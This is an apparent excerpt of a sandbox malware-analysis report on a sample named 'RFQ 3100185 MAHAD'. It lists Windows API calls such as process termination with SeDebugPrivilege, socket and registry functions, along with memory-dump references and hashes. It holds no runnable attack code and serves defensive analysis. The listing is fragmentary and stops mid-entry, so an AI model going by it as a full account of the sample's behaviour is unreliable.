                                                            • Instruction Fuzzy Hash: 34517F30500208BAEF209F689C89BE97BADFF05318F644515F625D62E2D771E9D08A55
                                                            APIs
                                                            • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 0082DB1B
                                                            • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0082DB3C
                                                            • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 0082DB51
                                                            • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0082DB6E
                                                            • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0082DB95
                                                            • DestroyIcon.USER32(00000000,?,?,?,?,?,?,007CA67C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 0082DBA0
                                                            • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0082DBBD
                                                            • DestroyIcon.USER32(00000000,?,?,?,?,?,?,007CA67C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 0082DBC8
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                            • String ID:
                                                            • API String ID: 1268354404-0
                                                            • Opcode ID: f6acbcb8eb62e356736c9872d329406a2f66fcee6508fbc008d355ac909f7682
                                                            • Instruction ID: 164e2c650c11d232370b3ab89ea2b12808d9f312d37dded6c60fde85e4b754b9
                                                            • Opcode Fuzzy Hash: f6acbcb8eb62e356736c9872d329406a2f66fcee6508fbc008d355ac909f7682
                                                            • Instruction Fuzzy Hash: 5B514470600308EFDB209F68DC96FAA7BB8FB58764F10051CF946E6690D7B4A880DB50
                                                            APIs
                                                              • Part of subcall function 007F6EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,007F5FA6,?), ref: 007F6ED8
                                                              • Part of subcall function 007F6EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,007F5FA6,?), ref: 007F6EF1
                                                              • Part of subcall function 007F72CB: GetFileAttributesW.KERNEL32(?,007F6019), ref: 007F72CC
                                                            • lstrcmpiW.KERNEL32(?,?), ref: 007F75CA
                                                            • _wcscmp.LIBCMT ref: 007F75E2
                                                            • MoveFileW.KERNEL32(?,?), ref: 007F75FB
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                            • String ID:
                                                            • API String ID: 793581249-0
                                                            • Opcode ID: 7f8e0594eb7d746545d4180dc6df87d963cf693b7f2d5d3548a422601a50c6ef
                                                            • Instruction ID: cadc688e426bf28690ab39bc940387feb1707b67a186e16fff9c5bda2d26067b
                                                            • Opcode Fuzzy Hash: 7f8e0594eb7d746545d4180dc6df87d963cf693b7f2d5d3548a422601a50c6ef
                                                            • Instruction Fuzzy Hash: 0D5124B290921D9EDF54EB94D845DED73BCAF48310F00459AF605E3241EA7897C5CB70
                                                            APIs
                                                            • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,0082DAD1,00000004,00000000,00000000), ref: 007CEAEB
                                                            • ShowWindow.USER32(00000000,00000000,00000000,00000000,00000000,?,0082DAD1,00000004,00000000,00000000), ref: 007CEB32
                                                            • ShowWindow.USER32(00000000,00000006,00000000,00000000,00000000,?,0082DAD1,00000004,00000000,00000000), ref: 0082DC86
                                                            • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,0082DAD1,00000004,00000000,00000000), ref: 0082DCF2
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: ShowWindow
                                                            • String ID:
                                                            • API String ID: 1268545403-0
                                                            • Opcode ID: 1c97ef1669a51848f018428f72834d9e70bb34603c373679d4b8cc94fa2605df
                                                            • Instruction ID: deba578d313515c13c790686c925f26a6e041a9ad3b37e9c04a40f8aa08f0028
                                                            • Opcode Fuzzy Hash: 1c97ef1669a51848f018428f72834d9e70bb34603c373679d4b8cc94fa2605df
                                                            • Instruction Fuzzy Hash: 4741C5F1209780DADB394F28AD8DF7A7B96FB95304F19480DF18786A61D778AC80D711
                                                            APIs
                                                            • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,007EAEF1,00000B00,?,?), ref: 007EB26C
                                                            • HeapAlloc.KERNEL32(00000000,?,007EAEF1,00000B00,?,?), ref: 007EB273
                                                            • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,007EAEF1,00000B00,?,?), ref: 007EB288
                                                            • GetCurrentProcess.KERNEL32(?,00000000,?,007EAEF1,00000B00,?,?), ref: 007EB290
                                                            • DuplicateHandle.KERNEL32(00000000,?,007EAEF1,00000B00,?,?), ref: 007EB293
                                                            • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,007EAEF1,00000B00,?,?), ref: 007EB2A3
                                                            • GetCurrentProcess.KERNEL32(007EAEF1,00000000,?,007EAEF1,00000B00,?,?), ref: 007EB2AB
                                                            • DuplicateHandle.KERNEL32(00000000,?,007EAEF1,00000B00,?,?), ref: 007EB2AE
                                                            • CreateThread.KERNEL32(00000000,00000000,007EB2D4,00000000,00000000,00000000), ref: 007EB2C8
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                            • String ID:
                                                            • API String ID: 1957940570-0
                                                            • Opcode ID: 7708864df5a885be196a9261698c2bc2f19013cceb76c82ac3c3cd56d0a5cebf
                                                            • Instruction ID: 4ace77394e0b2baf3121259368176276836daa409fabe2807956040f695bed56
                                                            • Opcode Fuzzy Hash: 7708864df5a885be196a9261698c2bc2f19013cceb76c82ac3c3cd56d0a5cebf
                                                            • Instruction Fuzzy Hash: E901BFB6640344BFEB10ABA5EC49F5B7BACFB88711F014415FA05DB2A1D6749C00CB61
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: NULL Pointer assignment$Not an Object type
                                                            • API String ID: 0-572801152
                                                            • Opcode ID: c324c9fd4a4bc6f8c3d04e91b58074a76d8fdbae7223809f41f2e57e3a57927c
                                                            • Instruction ID: 1fd463e9ef12d5e86ff256b6eb4ab2d70d7dfb13d34b0012294224169d7ef9c9
                                                            • Opcode Fuzzy Hash: c324c9fd4a4bc6f8c3d04e91b58074a76d8fdbae7223809f41f2e57e3a57927c
                                                            • Instruction Fuzzy Hash: 86E1BF71A00219ABDF50DFA8DC85AAE77B5FF48314F148229F905EB2C1D774AD41CB94
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: Variant$ClearInit$_memset
                                                            • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                            • API String ID: 2862541840-625585964
                                                            • Opcode ID: 15f3e184546369596d15e82698f99c543d58034b27e20cd9e42569da69fd447d
                                                            • Instruction ID: 461a4e0df9e8bbe7bf34ab52aa2db34a38410f6fadf55c42240bd538c74c6999
                                                            • Opcode Fuzzy Hash: 15f3e184546369596d15e82698f99c543d58034b27e20cd9e42569da69fd447d
                                                            • Instruction Fuzzy Hash: 6B918E71A00219ABDF64CFA4DC48FAEB7B8FF85714F10855AF915EB280DB749940CBA0
                                                            APIs
                                                            • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00819B19
                                                            • SendMessageW.USER32(?,00001036,00000000,?), ref: 00819B2D
                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00819B47
                                                            • _wcscat.LIBCMT ref: 00819BA2
                                                            • SendMessageW.USER32(?,00001057,00000000,?), ref: 00819BB9
                                                            • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00819BE7
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$Window_wcscat
                                                            • String ID: SysListView32
                                                            • API String ID: 307300125-78025650
                                                            • Opcode ID: fa43f23783d0a482920e62db25942f15ab0abe4b49628bb5cefbac3e76495ed0
                                                            • Instruction ID: ceb19adac1c050151f5ae7634feb911444e96b19cc6a66064bcb61a184f80612
                                                            • Opcode Fuzzy Hash: fa43f23783d0a482920e62db25942f15ab0abe4b49628bb5cefbac3e76495ed0
                                                            • Instruction Fuzzy Hash: A3419E70900318ABDB219FA4D889BEA77ACFF08350F10482AF589E7291D6759D848B60
                                                            APIs
                                                              • Part of subcall function 007F6532: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 007F6554
                                                              • Part of subcall function 007F6532: Process32FirstW.KERNEL32(00000000,0000022C), ref: 007F6564
                                                              • Part of subcall function 007F6532: CloseHandle.KERNEL32(00000000,?,00000000), ref: 007F65F9
                                                            • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0081179A
                                                            • GetLastError.KERNEL32 ref: 008117AD
                                                            • OpenProcess.KERNEL32(00000001,00000000,?), ref: 008117D9
                                                            • TerminateProcess.KERNEL32(00000000,00000000), ref: 00811855
                                                            • GetLastError.KERNEL32(00000000), ref: 00811860
                                                            • CloseHandle.KERNEL32(00000000), ref: 00811895
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                            • String ID: SeDebugPrivilege
                                                            • API String ID: 2533919879-2896544425
                                                            • Opcode ID: 41b3269de1f9fc08cfdc8cc48d69b6f1c320f3b7b1afae06c40c9dd1fe502434
                                                            • Instruction ID: 8d8d66ec135e47f0eac7a2986aa8a096a18488d0df2809a97caecc7edf4dcead
                                                            • Opcode Fuzzy Hash: 41b3269de1f9fc08cfdc8cc48d69b6f1c320f3b7b1afae06c40c9dd1fe502434
                                                            • Instruction Fuzzy Hash: 4F41AC72600204EFDB15EF54C899FAEB7A5BF44300F048469FA069F3D2DB78A9418B51
                                                            APIs
                                                            • LoadIconW.USER32(00000000,00007F03), ref: 007F58B8
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: IconLoad
                                                            • String ID: blank$info$question$stop$warning
                                                            • API String ID: 2457776203-404129466
                                                            • Opcode ID: 110618f9320a9a62cb6093f8dfc3fb3991c0277727088262a4e83892f49fbea3
                                                            • Instruction ID: c0dbcae8c2bb886f5ac9a5a2593548e4196d72ead219507890d6c73c7e14178c
                                                            • Opcode Fuzzy Hash: 110618f9320a9a62cb6093f8dfc3fb3991c0277727088262a4e83892f49fbea3
                                                            • Instruction Fuzzy Hash: 0F110D3160974AFAE7015B54DC82DBA27ACEF25364F30003BF751E5381E7ACAA1042A4
                                                            APIs
                                                            • SafeArrayGetVartype.OLEAUT32(?,00000000), ref: 007FA806
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: ArraySafeVartype
                                                            • String ID:
                                                            • API String ID: 1725837607-0
                                                            • Opcode ID: 8acd6877ce3ae3b442954e3c105e2cd4188431fd6d789d07a6a42ff3805080fd
                                                            • Instruction ID: cb47832c15ab40aa2e475454072f6c2cdd266de64ad138e526e3a4711a2b6589
                                                            • Opcode Fuzzy Hash: 8acd6877ce3ae3b442954e3c105e2cd4188431fd6d789d07a6a42ff3805080fd
                                                            • Instruction Fuzzy Hash: 1BC17CB5A0420AEFDB04DF98D485BBEB7B4FF08311F208469E619E7341D778AA45CB91
                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 007F6B63
                                                            • LoadStringW.USER32(00000000), ref: 007F6B6A
                                                            • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 007F6B80
                                                            • LoadStringW.USER32(00000000), ref: 007F6B87
                                                            • _wprintf.LIBCMT ref: 007F6BAD
                                                            • MessageBoxW.USER32(00000000,?,?,00011010), ref: 007F6BCB
                                                            Strings
                                                            • %s (%d) : ==> %s: %s %s, xrefs: 007F6BA8
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: HandleLoadModuleString$Message_wprintf
                                                            • String ID: %s (%d) : ==> %s: %s %s
                                                            • API String ID: 3648134473-3128320259
                                                            • Opcode ID: bed1469b76402af3d8787a007566c66820e9bd91acd7292ef5911170b1b009bc
                                                            • Instruction ID: fae6816ac31a0c79ed88ffec702aaf65a626ab010d6caea0008d270ec461f0a3
                                                            • Opcode Fuzzy Hash: bed1469b76402af3d8787a007566c66820e9bd91acd7292ef5911170b1b009bc
                                                            • Instruction Fuzzy Hash: C50136F6900318BFEB11A7D4AD89EFB776CE704304F004895B745D2141EA749E848F74
                                                            APIs
                                                              • Part of subcall function 00813C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00812BB5,?,?), ref: 00813C1D
                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00812BF6
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: BuffCharConnectRegistryUpper
                                                            • String ID:
                                                            • API String ID: 2595220575-0
                                                            • Opcode ID: 831ca4f5b40a2ec257528d29ad8b860771e32a3b39013735c990af07ca6f851b
                                                            • Instruction ID: 433184785fa5f9333471b4f75dfdf3f862057da982271fad1a49be7e75c035b2
                                                            • Opcode Fuzzy Hash: 831ca4f5b40a2ec257528d29ad8b860771e32a3b39013735c990af07ca6f851b
                                                            • Instruction Fuzzy Hash: B5916671204204DFCB15EF14D895FAEB7E9FF88310F04881DF9969B2A2DB34A995CB42
                                                            APIs
                                                            • select.WSOCK32 ref: 00809691
                                                            • WSAGetLastError.WSOCK32(00000000), ref: 0080969E
                                                            • __WSAFDIsSet.WSOCK32(00000000,?,00000000), ref: 008096C8
                                                            • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 008096E9
                                                            • WSAGetLastError.WSOCK32(00000000), ref: 008096F8
                                                            • htons.WSOCK32(?,?,?,00000000,?), ref: 008097AA
                                                            • inet_ntoa.WSOCK32(?,?,?,?,?,?,?,?,?,?,?,?,0084DC00), ref: 00809765
                                                              • Part of subcall function 007ED2FF: _strlen.LIBCMT ref: 007ED309
                                                            • _strlen.LIBCMT ref: 00809800
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast_strlen$htonsinet_ntoaselect
                                                            • String ID:
                                                            • API String ID: 3480843537-0
                                                            • Opcode ID: b3074bc4efac345476b0f5be2b0c581520d318899b8f2e9ac95b4e64f01ed918
                                                            • Instruction ID: 494fe5ad4667001ce6c56cf9172f56492fe7d2d788aa8b8e1d8a2892741a0333
                                                            • Opcode Fuzzy Hash: b3074bc4efac345476b0f5be2b0c581520d318899b8f2e9ac95b4e64f01ed918
                                                            • Instruction Fuzzy Hash: E4819B71504240ABC714EF64CC89FABB7A8FF89714F104A2DF5959B2A2EB34D904CB92
                                                            APIs
                                                            • __mtinitlocknum.LIBCMT ref: 007DA991
                                                              • Part of subcall function 007D7D7C: __FF_MSGBANNER.LIBCMT ref: 007D7D91
                                                              • Part of subcall function 007D7D7C: __NMSG_WRITE.LIBCMT ref: 007D7D98
                                                              • Part of subcall function 007D7D7C: __malloc_crt.LIBCMT ref: 007D7DB8
                                                            • __lock.LIBCMT ref: 007DA9A4
                                                            • __lock.LIBCMT ref: 007DA9F0
                                                            • InitializeCriticalSectionAndSpinCount.KERNEL32(8000000C,00000FA0,00866DE0,00000018,007E5E7B,?,00000000,00000109), ref: 007DAA0C
                                                            • EnterCriticalSection.KERNEL32(8000000C,00866DE0,00000018,007E5E7B,?,00000000,00000109), ref: 007DAA29
                                                            • LeaveCriticalSection.KERNEL32(8000000C), ref: 007DAA39
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: CriticalSection$__lock$CountEnterInitializeLeaveSpin__malloc_crt__mtinitlocknum
                                                            • String ID:
                                                            • API String ID: 1422805418-0
                                                            • Opcode ID: bd2353c1633a8ce890587394d99482302988f8c2c3521fccd10fd9d361b41c40
                                                            • Instruction ID: dbda6fe23c50aecf26010c8bfda2e5e63b60f4cad5a7e5727a3a78a3980302b4
                                                            • Opcode Fuzzy Hash: bd2353c1633a8ce890587394d99482302988f8c2c3521fccd10fd9d361b41c40
                                                            • Instruction Fuzzy Hash: 10410771900206EBEB149F68DA48759BBB0BF41325F10831BE529AB3D1DB7C9D51CB92
                                                            APIs
                                                            • DeleteObject.GDI32(00000000), ref: 00818EE4
                                                            • GetDC.USER32(00000000), ref: 00818EEC
                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00818EF7
                                                            • ReleaseDC.USER32(00000000,00000000), ref: 00818F03
                                                            • CreateFontW.GDI32(?,00000000,00000000,00000000,00000000,?,?,?,00000001,00000004,00000000,?,00000000,?), ref: 00818F3F
                                                            • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00818F50
                                                            • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,0081BD19,?,?,000000FF,00000000,?,000000FF,?), ref: 00818F8A
                                                            • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00818FAA
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                            • String ID:
                                                            • API String ID: 3864802216-0
                                                            • Opcode ID: 324cf4629fb0a28e743815ce389522eadacdcc69ffc8076c09d15ffae23988f6
                                                            • Instruction ID: 151f0b98430663fe8f0c99c7d9146b030bda1091a0d7bbf9a739e13da8e8dffc
                                                            • Opcode Fuzzy Hash: 324cf4629fb0a28e743815ce389522eadacdcc69ffc8076c09d15ffae23988f6
                                                            • Instruction Fuzzy Hash: 54317C72200614BFEB108F50DC8AFEA3BADFF89715F044065FE08DA191DAB59842CBB0
                                                            APIs
                                                              • Part of subcall function 007B936C: __swprintf.LIBCMT ref: 007B93AB
